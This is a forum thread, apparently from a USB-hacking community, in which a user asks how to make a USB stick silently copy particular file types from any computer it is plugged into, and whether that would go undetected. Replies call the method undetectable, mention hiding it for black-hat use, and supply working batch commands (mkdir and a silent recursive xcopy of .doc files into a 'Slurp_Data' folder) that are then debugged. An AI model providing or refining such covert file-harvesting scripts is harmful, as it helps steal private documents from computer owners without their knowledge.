Simple goal,simple task ?

Senior Juan

Hey guys,these usb hacks are awsome.I have a simple task that i want to perform,I just want when i insert my usb stick to a computer,to search for specific type of files in the computer's hard drive and copy them to the usb,just that.Is something like this possible ? This kind of task will run udetected or will it trigger an alarm ? Thanks in advance.

Hey guys,these usb hacks are awsome.I have a simple task that i want to perform,I just want when i insert my usb stick to a computer,to search for specific type of files in the computer's hard drive and copy them to the usb,just that.Is something like this possible ? This kind of task will run udetected or will it trigger an alarm ? Thanks in advance.

You can search from specific type of files. The task is undetectable and you can find the solution reading the forum...

The filtering and copying can be done with just a batch file. But, you will only be able to do it in one/two directories. If this is black/grey hat, you are gonna need something like nircmd.

Not only able to do it in one/two directories... You can search from the entire hdd. nircmd is not needed (also you can use it), you can program it to make the work invisible, it not depends on what white/grey/black hat you do, but the way you program it and use it.

This code should search C,find .doc files and copy them to the specified directory,what is the mistake ?

:: Desktop files
mkdir ..\..\Documents\logfiles\%computername%\Slurp_Data\Desktop\
xcopy "C:\*.doc" "..\..\Documents\logfiles\%computername%\Slurp_Data\Desktop\" /s /c /q /r /h /y

There's no mistake. It's a piece from pocketknife and the only you have to do is defining the path you want to copy the files to.

Previous to creating the path %computername%\Slurp_Data\Desktop, you must create the ..\..\Documents folder, the \logfiles folder, the %computername% folder, the Slurp_Data folder...

Use one mkdir for each folder...

mkdir ..\..\Documents
mkdir ..\..\Documents\logfiles
mkdir ..\..\Documents\logfiles\%computername%
mkdir ..\..\Documents\logfiles\%computername%\Slurp_Data
mkdir ..\..\Documents\logfiles\%computername%\Slurp_Data\Desktop
xcopy "C:\*.doc" "..\..\Documents\logfiles\%computername%\Slurp_Data\Desktop\" /s /c /q /r /h /y